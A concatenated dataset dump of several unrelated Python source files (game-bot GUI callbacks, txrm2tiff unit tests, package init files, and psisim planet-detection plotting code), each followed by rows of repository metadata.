self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_location_x_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_potion_empty_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_moving_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_migung_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_sudong_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_combat_box_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_hunt_period_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_loot_box_boolean_booleanvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_box_range_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_thing_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_limit_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_set_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_number_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_wait_attack_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_migung_lag_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_jadong_lag_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_mainquest_afk_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_period_mainquest_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_conversation_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_threshold_mainquest_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
# def callback_threshold_gate_stringvar(self, args, option_name):
# self.set_game_config(option_name, self.option_dic[option_name].get())
# def callback_threshold_next_stringvar(self, args, option_name):
# self.set_game_config(option_name, self.option_dic[option_name].get())
| 37.008694 | 146 | 0.727192 | 25,381 | 178,789 | 4.774083 | 0.030968 | 0.096937 | 0.101014 | 0.138895 | 0.942206 | 0.927392 | 0.916927 | 0.890609 | 0.836735 | 0.768402 | 0 | 0.012164 | 0.152577 | 178,789 | 4,830 | 147 | 37.016356 | 0.787519 | 0.040534 | 0 | 0.47216 | 0 | 0 | 0.086554 | 0.015352 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049775 | false | 0.000281 | 0.002531 | 0.000562 | 0.073678 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bac4113677396df983d10be004ce726c560fc4e8 | 48 | py | Python | CursoEmVideo/Aula22/ex112/utilidades/__init__.py | lucashsouza/Desafios-Python | abb5b11ebdfd4c232b4f0427ef41fd96013f2802 | [
"MIT"
] | null | null | null | CursoEmVideo/Aula22/ex112/utilidades/__init__.py | lucashsouza/Desafios-Python | abb5b11ebdfd4c232b4f0427ef41fd96013f2802 | [
"MIT"
] | null | null | null | CursoEmVideo/Aula22/ex112/utilidades/__init__.py | lucashsouza/Desafios-Python | abb5b11ebdfd4c232b4f0427ef41fd96013f2802 | [
"MIT"
] | null | null | null | from Aula22.ex112.utilidades import moeda, dado
| 24 | 47 | 0.833333 | 7 | 48 | 5.714286 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 0.104167 | 48 | 1 | 48 | 48 | 0.813953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bae7bd3ae8dccac76b7c357aad15987fd8171fa1 | 30 | py | Python | src/features/__init__.py | iscfgibarra/mlops-calculadora | a999eb2d65e172317b25de409fb4fdb1c9149c68 | [
"FTL"
] | null | null | null | src/features/__init__.py | iscfgibarra/mlops-calculadora | a999eb2d65e172317b25de409fb4fdb1c9149c68 | [
"FTL"
] | null | null | null | src/features/__init__.py | iscfgibarra/mlops-calculadora | a999eb2d65e172317b25de409fb4fdb1c9149c68 | [
"FTL"
] | null | null | null | from .build_features import *
| 15 | 29 | 0.8 | 4 | 30 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
244306a1dc42de557dca8be7f27b4cb2b9e2b304 | 8,245 | py | Python | tests/test_run.py | DiamondLightSource/txrm2tiff | b7ce8e37ac3f599c04bc49be9c72286f6447dec1 | [
"BSD-3-Clause"
] | null | null | null | tests/test_run.py | DiamondLightSource/txrm2tiff | b7ce8e37ac3f599c04bc49be9c72286f6447dec1 | [
"BSD-3-Clause"
] | null | null | null | tests/test_run.py | DiamondLightSource/txrm2tiff | b7ce8e37ac3f599c04bc49be9c72286f6447dec1 | [
"BSD-3-Clause"
] | null | null | null | import unittest
from unittest.mock import patch, MagicMock, call
from pathlib import Path
from tempfile import TemporaryDirectory
from random import randint, sample
from txrm2tiff.run import run, _batch_convert_files, _convert_and_save, _define_output_suffix, TxrmToImage
class TestRun(unittest.TestCase):
def test_define_output_suffix(self):
txrm_output = _define_output_suffix(Path("file.txrm"))
self.assertEqual("file.ome.tiff", str(txrm_output))
xrm_output = _define_output_suffix(Path("file.xrm"))
self.assertEqual("file.ome.tif", str(xrm_output))
txrm_output2 = _define_output_suffix(Path("file.extension"), ".txrm")
self.assertEqual("file.ome.tiff", str(txrm_output2))
xrm_output2 = _define_output_suffix(Path("file.extension"), ".xrm")
self.assertEqual("file.ome.tif", str(xrm_output2))
with self.assertRaises(NameError):
_define_output_suffix(Path("file.bad_extension"), None)
def test_define_output_suffix(self):
txrm_output = _define_output_suffix(Path("file.txrm"))
xrm_output = _define_output_suffix(Path("file.xrm"))
self.assertEqual("file.ome.tiff", str(txrm_output))
self.assertEqual("file.ome.tif", str(xrm_output))
@patch('txrm2tiff.run.file_can_be_opened', MagicMock(return_value=True))
@patch('txrm2tiff.run.ole_file_works', MagicMock(return_value=True))
@patch.object(TxrmToImage, 'convert')
@patch.object(TxrmToImage, 'save')
def test_convert_and_save(self, mocked_save, mocked_convert):
input_filepath = Path("test_file.txrm")
_convert_and_save(input_filepath, None, None, False, None, False)
mocked_convert.assert_called_with(input_filepath, None, False, False)
mocked_save.assert_called_with(input_filepath.with_suffix(".ome.tiff"), None)
@patch('pathlib.Path.mkdir', MagicMock())
@patch('txrm2tiff.run.file_can_be_opened', MagicMock(return_value=True))
@patch('txrm2tiff.run.ole_file_works', MagicMock(return_value=True))
@patch.object(TxrmToImage, 'convert')
@patch.object(TxrmToImage, 'save')
def test_convert_and_save_with_str_output(self, mocked_save, mocked_convert):
input_filepath = Path("test_file.txrm")
output_str = "./output/file.extension"
_convert_and_save(input_filepath, output_str, None, False, None, False)
mocked_convert.assert_called_with(input_filepath, None, False, False)
mocked_save.assert_called_with(Path(output_str), None)
@patch('pathlib.Path.mkdir', MagicMock())
@patch('txrm2tiff.run.file_can_be_opened', MagicMock(return_value=True))
@patch('txrm2tiff.run.ole_file_works', MagicMock(return_value=True))
@patch.object(TxrmToImage, 'convert')
@patch.object(TxrmToImage, 'save')
def test_convert_and_save_with_dir_str_output(self, mocked_save, mocked_convert):
input_filepath = Path("test_file.txrm")
output_str = "./output"
_convert_and_save(input_filepath, output_str, None, False, None, False)
mocked_convert.assert_called_with(input_filepath, None, False, False)
mocked_save.assert_called_with((Path(output_str) / input_filepath.name).with_suffix(".ome.tiff"), None)
@patch('pathlib.Path.mkdir', MagicMock())
@patch('txrm2tiff.run.file_can_be_opened', MagicMock(return_value=True))
@patch('txrm2tiff.run.ole_file_works', MagicMock(return_value=True))
@patch.object(TxrmToImage, 'convert')
@patch.object(TxrmToImage, 'save')
def test_convert_and_save_with_ome_output(self, mocked_save, mocked_convert):
input_filepath = Path("test_file.txrm")
output_str = "./output/file.ome.tiff"
_convert_and_save(input_filepath, output_str, None, False, None, False)
mocked_convert.assert_called_with(input_filepath, None, False, False)
mocked_save.assert_called_with(Path(output_str), None)
@patch('pathlib.Path.mkdir', MagicMock())
@patch('txrm2tiff.run.file_can_be_opened', MagicMock(return_value=True))
@patch('txrm2tiff.run.ole_file_works', MagicMock(return_value=True))
@patch.object(TxrmToImage, 'convert')
@patch.object(TxrmToImage, 'save')
def test_convert_and_save_with_dir_Path_output(self, mocked_save, mocked_convert):
input_filepath = Path("test_file.txrm")
output_filepath = Path("./output/")
_convert_and_save(input_filepath, output_filepath, None, False, None, False)
mocked_convert.assert_called_with(input_filepath, None, False, False)
mocked_save.assert_called_with(_define_output_suffix(output_filepath / input_filepath.name), None)
@patch('txrm2tiff.run.file_can_be_opened', MagicMock(return_value=True))
@patch('txrm2tiff.run.ole_file_works', MagicMock(return_value=True))
@patch.object(TxrmToImage, 'convert')
@patch.object(TxrmToImage, 'save')
def test_convert_and_save_with_invalid_output(self, mocked_save, mocked_convert):
input_filepath = Path("test_file.txrm")
_convert_and_save(input_filepath, 12345, None, False, None, False)
mocked_convert.assert_called_with(input_filepath, None, False, False)
mocked_save.assert_called_with(_define_output_suffix(input_filepath), None)
def test_batch_convert_files_basic(self):
with patch('txrm2tiff.run._convert_and_save', MagicMock()) as mocked_convert:
with TemporaryDirectory(dir=".") as tmpdir:
tmppath = Path(tmpdir)
num_files = randint(5, 10)
fake_file_list = []
for i in sample(range(0, 99999), num_files):
fake_file = (tmppath / f"{i}.txrm")
fake_file.touch()
fake_file_list.append(fake_file)
_batch_convert_files(tmppath, None, False, None, False)
call_list = []
for fake_file in fake_file_list:
output_path = _define_output_suffix(fake_file)
call_list.append(call(fake_file, output_path, None, False, None, False))
mocked_convert.assert_has_calls(call_list, any_order=True)
def test_batch_convert_files_with_output_and_deep_dir(self):
with patch('txrm2tiff.run._convert_and_save', MagicMock()) as mocked_convert:
with TemporaryDirectory(dir=".") as tmp_in:
with TemporaryDirectory(dir=".") as tmp_out:
tmp_in_path = Path(tmp_in)
tmp_out_path = Path(tmp_out)
tmp_in_path_deep = tmp_in_path / "deep" / "dirs"
tmp_out_deep = tmp_out_path / "deep" / "dirs"
tmp_in_path_deep.mkdir(parents=True)
num_files = randint(5, 10)
fake_file_list = []
for i in sample(range(0, 99999), num_files):
fake_file = tmp_in_path_deep / f"{i}.txrm"
fake_file.touch()
fake_file_list.append(fake_file)
_batch_convert_files(tmp_in_path, tmp_out, False, None, False)
self.assertTrue(tmp_out_deep.exists())
call_list = []
for fake_file in fake_file_list:
output_path = _define_output_suffix(fake_file)
call_list.append(call(fake_file, tmp_out_deep / output_path.name, None, False, None, False))
mocked_convert.assert_has_calls(call_list, any_order=True)
def test_run_with_file(self):
with patch('txrm2tiff.run._convert_and_save', MagicMock()) as mocked_convert:
with TemporaryDirectory(dir=".") as tmp_in:
tmp_in_filepath = Path(tmp_in) / f"{randint(0,9999)}.xrm"
tmp_in_filepath.touch()
run(tmp_in_filepath)
mocked_convert.assert_called_with(tmp_in_filepath, None, None, False, None, False)
def test_run_with_dir(self, ):
with patch('txrm2tiff.run._batch_convert_files', MagicMock()) as mocked_batch_convert:
with TemporaryDirectory(dir=".") as tmp_in:
tmp_in_path = Path(tmp_in)
run(tmp_in_path)
mocked_batch_convert.assert_called_with(tmp_in_path, None, False, None, False)
| 50.895062 | 111 | 0.682474 | 1,053 | 8,245 | 4.975309 | 0.091168 | 0.049819 | 0.042756 | 0.054972 | 0.83432 | 0.803779 | 0.774766 | 0.751288 | 0.717122 | 0.707769 | 0 | 0.007506 | 0.208247 | 8,245 | 161 | 112 | 51.21118 | 0.795037 | 0 | 0 | 0.595588 | 0 | 0 | 0.12262 | 0.067071 | 0 | 0 | 0 | 0 | 0.176471 | 1 | 0.088235 | false | 0 | 0.044118 | 0 | 0.139706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
246a404b1021a184ee855ae4bce253758d0180e0 | 221 | py | Python | sdcclient/monitor/dashboard_converters/__init__.py | dark-vex/sysdig-sdk-python | 52962a0c283ca12b93a743ae8c5d1639a12b0998 | [
"MIT"
] | 45 | 2016-04-11T16:50:15.000Z | 2020-07-11T23:37:51.000Z | sdcclient/monitor/dashboard_converters/__init__.py | dark-vex/sysdig-sdk-python | 52962a0c283ca12b93a743ae8c5d1639a12b0998 | [
"MIT"
] | 74 | 2016-08-09T17:10:55.000Z | 2020-07-09T08:36:16.000Z | sdcclient/monitor/dashboard_converters/__init__.py | dark-vex/sysdig-sdk-python | 52962a0c283ca12b93a743ae8c5d1639a12b0998 | [
"MIT"
] | 39 | 2016-04-20T17:22:23.000Z | 2020-07-08T17:25:52.000Z | from ._dashboard_scope import convert_scope_string_to_expression
from ._dashboard_versions import convert_dashboard_between_versions
__all__ = ["convert_dashboard_between_versions", "convert_scope_string_to_expression"]
| 44.2 | 86 | 0.895928 | 27 | 221 | 6.518519 | 0.407407 | 0.147727 | 0.204545 | 0.227273 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 221 | 4 | 87 | 55.25 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0.307692 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
03622fc54ba2754357cc93fce949c2675566af30 | 36 | py | Python | python_utility/__init__.py | masked-runner/pi-util | f97a4ff34510c83f4b17e9585bc15cfa66b537dc | [
"MIT"
] | null | null | null | python_utility/__init__.py | masked-runner/pi-util | f97a4ff34510c83f4b17e9585bc15cfa66b537dc | [
"MIT"
] | null | null | null | python_utility/__init__.py | masked-runner/pi-util | f97a4ff34510c83f4b17e9585bc15cfa66b537dc | [
"MIT"
] | null | null | null | from python_utility.util import Util | 36 | 36 | 0.888889 | 6 | 36 | 5.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 36 | 1 | 36 | 36 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cee7f82b7b019097e056d251ea211c7ec23dbf03 | 210 | py | Python | src/snc/agents/activity_rate_to_mpc_actions/mpc_utils.py | dmcnamee/snc | c2da8c1e9ecdc42c59b9de73224b3d50ee1c9786 | [
"Apache-2.0"
] | 5 | 2021-03-24T16:23:10.000Z | 2021-11-17T12:44:51.000Z | src/snc/agents/activity_rate_to_mpc_actions/mpc_utils.py | dmcnamee/snc | c2da8c1e9ecdc42c59b9de73224b3d50ee1c9786 | [
"Apache-2.0"
] | 3 | 2021-03-26T01:16:08.000Z | 2021-05-08T22:06:47.000Z | src/snc/agents/activity_rate_to_mpc_actions/mpc_utils.py | dmcnamee/snc | c2da8c1e9ecdc42c59b9de73224b3d50ee1c9786 | [
"Apache-2.0"
] | 2 | 2021-03-24T17:20:06.000Z | 2021-04-19T09:01:12.000Z |
def check_num_time_steps(num_mpc_steps: int) -> None:
assert isinstance(num_mpc_steps, int), "Number of MPC steps is not integer."
assert num_mpc_steps >= 1, "Number of MPC steps is zero or negative."
| 42 | 80 | 0.738095 | 36 | 210 | 4.055556 | 0.527778 | 0.273973 | 0.226027 | 0.191781 | 0.246575 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005747 | 0.171429 | 210 | 4 | 81 | 52.5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0.358852 | 0 | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0619922b93f5e2664deba84932c5de592242a858 | 115 | py | Python | pysindy/deeptime/__init__.py | znicolaou/pysindy | f77e85f895da1d3ed98f9a6d84327d984f5d957c | [
"MIT"
] | 613 | 2020-01-22T17:41:47.000Z | 2022-03-29T08:35:48.000Z | pysindy/deeptime/__init__.py | znicolaou/pysindy | f77e85f895da1d3ed98f9a6d84327d984f5d957c | [
"MIT"
] | 128 | 2020-01-14T16:30:08.000Z | 2022-03-17T13:00:29.000Z | pysindy/deeptime/__init__.py | znicolaou/pysindy | f77e85f895da1d3ed98f9a6d84327d984f5d957c | [
"MIT"
] | 161 | 2020-01-23T09:26:53.000Z | 2022-03-31T18:17:59.000Z | from .deeptime import SINDyEstimator
from .deeptime import SINDyModel
__all__ = ["SINDyEstimator", "SINDyModel"]
| 19.166667 | 42 | 0.791304 | 11 | 115 | 7.909091 | 0.545455 | 0.275862 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121739 | 115 | 5 | 43 | 23 | 0.861386 | 0 | 0 | 0 | 0 | 0 | 0.208696 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
06312da088425d61259710a69178429c5ce3f8da | 179 | py | Python | lib/psa/functional.py | Hemanth-Gattu/TrSeg | 0bc24004cea943201c8bd289c7b2caeac3753999 | [
"MIT"
] | 330 | 2020-04-02T06:14:10.000Z | 2022-03-30T07:54:44.000Z | lib/psa/functional.py | zhixuanli/semseg | 5e5a0ba7a1fa2cc06f3e8c060cbedff08e160d33 | [
"MIT"
] | 19 | 2020-04-10T19:15:27.000Z | 2022-02-24T03:14:31.000Z | lib/psa/functional.py | zhixuanli/semseg | 5e5a0ba7a1fa2cc06f3e8c060cbedff08e160d33 | [
"MIT"
] | 53 | 2020-04-03T06:59:55.000Z | 2022-02-15T01:55:17.000Z | """Functional interface"""
from . import functions
def psa_mask(input, psa_type=0, mask_H_=None, mask_W_=None):
return functions.PSAMask(psa_type, mask_H_, mask_W_)(input)
| 22.375 | 63 | 0.748603 | 28 | 179 | 4.392857 | 0.571429 | 0.113821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006369 | 0.122905 | 179 | 7 | 64 | 25.571429 | 0.77707 | 0.111732 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
0635b561796402814ff51cd4e08da51d9c081716 | 10,358 | py | Python | psisim/plots.py | abgibbs/psisim | 9b0a6ac4f134cabcd2b10a03e20b2fcb58c8afe7 | [
"BSD-3-Clause"
] | 4 | 2019-06-08T01:09:04.000Z | 2022-01-19T21:36:20.000Z | psisim/plots.py | abgibbs/psisim | 9b0a6ac4f134cabcd2b10a03e20b2fcb58c8afe7 | [
"BSD-3-Clause"
] | 46 | 2019-06-26T20:42:19.000Z | 2022-03-09T21:52:44.000Z | psisim/plots.py | abgibbs/psisim | 9b0a6ac4f134cabcd2b10a03e20b2fcb58c8afe7 | [
"BSD-3-Clause"
] | 2 | 2020-07-22T21:28:36.000Z | 2021-01-29T22:50:08.000Z | import matplotlib.pyplot as plt
import numpy as np
import matplotlib.colors as colors
def make_plots():
'''
A dummy function.
'''
pass
def plot_detected_planet_contrasts(planet_table,wv_index,detected,flux_ratios,instrument,telescope,
show=True,save=False,ymin=1e-9,ymax=1e-4,xmin=0.,xmax=1.,alt_data=None,alt_label=""):
'''
Make a plot of the planets detected at a given wavelenth_index
Inputs:
planet_table - a Universe.planets table
wv_index - the index from the instrument.current_wvs
wavelength array to consider
detected - a boolean array of shape [n_planets,n_wvs]
that indicates whether or not a planet was detected
at a given wavelength
flux_ratios - an array of flux ratios between the planet and the star
at the given wavelength. sape [n_planets,n_wvs]
instuemnt - an instance of the psisim.instrument class
telescope - an instance of the psisim.telescope class
Keyword Arguments:
show - do you want to show the plot? Boolean
save - do you want to save the plot? Boolean
ymin,ymax,xmin,xmax - the limits on the plot
alt_data - An optional argument to pass to show a secondary set of data.
This could be e.g. detection limits, or another set of atmospheric models
alt_label - This sets the legend label for the alt_data
'''
fig,ax = plt.subplots(1,1,figsize=(7,5))
seps = np.array([planet_table_entry['AngSep'].to(u.arcsec).value for planet_table_entry in planet_table])
# import pdb; pdb.set_trace()
#Plot the non-detections
ax.scatter(seps[~detected[:,wv_index]],flux_ratios[:,wv_index][~detected[:,wv_index]],
marker='.',label="Full Sample",s=20)
# print(seps[~detected[:,wv_index]],flux_ratios[:,wv_index][~detected[:,wv_index]])
masses = np.array([planet_table_entry['PlanetMass'].to(u.earthMass).value for planet_table_entry in planet_table])
# import pdb; pdb.set_trace()
# import pdb; pdb.set_trace()
#Plot the detections
scat = ax.scatter(seps[detected[:,wv_index]],flux_ratios[:,wv_index][detected[:,wv_index]],marker='o',
label="Detected",c=masses[detected[:,wv_index]],cmap='gist_heat',edgecolors='k',norm=colors.LogNorm(vmin=1,vmax=1000))
fig.colorbar(scat,label=r"Planet Mass [$M_{\oplus}$]",ax=ax)
#Plot 1 and 2 lambda/d
ax.plot([instrument.current_wvs[wv_index]*1e-6/telescope.diameter*206265,instrument.current_wvs[wv_index]*1e-6/telescope.diameter*206265],
[0,1.],label=r"$\lambda/D$ at $\lambda=${:.3f}$\mu m$".format(instrument.current_wvs[wv_index]),color='k')
ax.plot([2*instrument.current_wvs[wv_index]*1e-6/telescope.diameter*206265,2*instrument.current_wvs[wv_index]*1e-6/telescope.diameter*206265],
[0,1.],'-.',label=r"$2\lambda/D$ at $\lambda=${:.3f}$\mu m$".format(instrument.current_wvs[wv_index]),color='k')
#If detection_limits is passed, then plot the 5-sigma detection limits for each source
if alt_data is not None:
ax.scatter(seps,alt_data[:,wv_index],marker='.',
label=alt_label,color='darkviolet',s=20)
for i,sep in enumerate(seps):
ax.plot([sep,sep],[flux_ratios[i,wv_index],alt_data[i,wv_index]],color='k',alpha=0.1,linewidth=1)
#Axis title
ax.set_title("Planet Detection Yield at {:.3}um".format(instrument.current_wvs[wv_index]),fontsize=18)
#Legend
legend = ax.legend(loc='upper right',fontsize=13)
legend.legendHandles[-1].set_color('orangered')
legend.legendHandles[-1].set_edgecolor('k')
#Plot setup
ax.set_ylabel("Total Intensity Flux Ratio",fontsize=16)
ax.set_xlabel("Separation ['']",fontsize=16)
# ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
ax.set_yscale('log')
ax.set_xscale('log')
#Do we show it?
if show:
plt.show()
plt.tight_layout()
#Do we save it?
if save:
plt.savefig("Detected_Planets_flux_v_sma.png",bbox_inches="tight")
#Return the figure so that the user can manipulate it more if they so please
return fig,ax
def plot_detected_planet_magnitudes(planet_table,wv_index,detected,flux_ratios,instrument,telescope,
show=True,save=False,ymin=1,ymax=30,xmin=0.,xmax=1.,alt_data=None,alt_label=""):
'''
Make a plot of the planets detected at a given wavelenth_index
Inputs:
planet_table - a Universe.planets table
wv_index - the index from the instrument.current_wvs
wavelength array to consider
detected - a boolean array of shape [n_planets,n_wvs]
that indicates whether or not a planet was detected
at a given wavelength
flux_ratios - an array of flux ratios between the planet and the star
at the given wavelength. sape [n_planets,n_wvs]
instuemnt - an instance of the psisim.instrument class
telescope - an instance of the psisim.telescope class
Keyword Arguments:
show - do you want to show the plot? Boolean
save - do you want to save the plot? Boolean
ymin,ymax,xmin,xmax - the limits on the plot
alt_data - An optional argument to pass to show a secondary set of data.
This could be e.g. detection limits, or another set of atmospheric models
alt_label - This sets the legend label for the alt_data
'''
fig,ax = plt.subplots(1,1,figsize=(7,5))
#convert flux ratios to delta_mags
dMags = -2.5*np.log10(flux_ratios[:,wv_index])
band = instrument.current_filter
if band == 'R':
bexlabel = 'CousinsR'
starlabel = 'StarRmag'
elif band == 'I':
bexlabel = 'CousinsI'
starlabel = 'StarImag'
elif band == 'J':
bexlabel = 'SPHEREJ'
starlabel = 'StarJmag'
elif band == 'H':
bexlabel = 'SPHEREH'
starlabel = 'StarHmag'
elif band == 'K':
bexlabel = 'SPHEREKs'
starlabel = 'StarKmag'
elif band == 'L':
bexlabel = 'NACOLp'
starlabel = 'StarKmag'
elif band == 'M':
bexlabel = 'NACOMp'
starlabel = 'StarKmag'
else:
raise ValueError("Band needs to be 'R', 'I', 'J', 'H', 'K', 'L', 'M'. Got {0}.".format(band))
stellar_mags = planet_table[starlabel]
stellar_mags = np.array(stellar_mags)
planet_mag = stellar_mags+dMags
# import pdb;pdb.set_trace()
seps = np.array([planet_table_entry['AngSep'].to(u.arcsec).value for planet_table_entry in planet_table])
# import pdb; pdb.set_trace()
#Plot the non-detections
ax.scatter(seps[~detected[:,wv_index]],planet_mag[:][~detected[:,wv_index]],
marker='.',label="Full Sample",s=20)
# print(seps[~detected[:,wv_index]],flux_ratios[:,wv_index][~detected[:,wv_index]])
masses = np.array([planet_table_entry['PlanetMass'].to(u.earthMass).value for planet_table_entry in planet_table])
# import pdb; pdb.set_trace()
# import pdb; pdb.set_trace()
#Plot the detections
scat = ax.scatter(seps[detected[:,wv_index]],planet_mag[:][detected[:,wv_index]],marker='o',
label="Detected",c=masses[detected[:,wv_index]],cmap='gist_heat',edgecolors='k',norm=colors.LogNorm(vmin=1,vmax=1000))
fig.colorbar(scat,label=r"Planet Mass [$M_{\oplus}$]",ax=ax)
import pdb; pdb.set_trace()
#Plot 1 and 2 lambda/d
ax.axvline(instrument.current_wvs[wv_index]*1e-6/telescope.diameter*206265,color='k',)
ax.axvline(2*instrument.current_wvs[wv_index]*1e-6/telescope.diameter*206265,color='k',linestyle='--')
ax.axhline(18.7+0.4,color='r',linestyle='-.',label="")
#If detection_limits is passed, then plot the 5-sigma detection limits for each source
if alt_data is not None:
ax.scatter(seps,alt_data[:,wv_index],marker='.',
label=alt_label,color='darkviolet',s=20)
for i,sep in enumerate(seps):
ax.plot([sep,sep],[flux_ratios[i,wv_index],alt_data[i,wv_index]],color='k',alpha=0.1,linewidth=1)
#Axis title
ax.set_title("Planet Detection Yield at {:.3}um".format(instrument.current_wvs[wv_index]),fontsize=18)
#Legend
legend = ax.legend(loc='upper right',fontsize=13)
legend.legendHandles[-1].set_color('orangered')
legend.legendHandles[-1].set_edgecolor('k')
#Plot setup
ax.set_ylabel(r"Planet Magnitude at {:.1f}$\mu m$".format(instrument.current_wvs[wv_index]),fontsize=16)
ax.set_xlabel("Separation ['']",fontsize=16)
# ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
# ax.set_yscale('log')
ax.set_xscale('log')
#Do we show it?
if show:
plt.show()
plt.tight_layout()
#Do we save it?
if save:
plt.savefig("Detected_Planets_flux_v_sma.png",bbox_inches="tight")
#Return the figure so that the user can manipulate it more if they so please
return fig,ax
def plot_detected_planet_mass(planet_table,detected,show=True,**kwargs):
'''
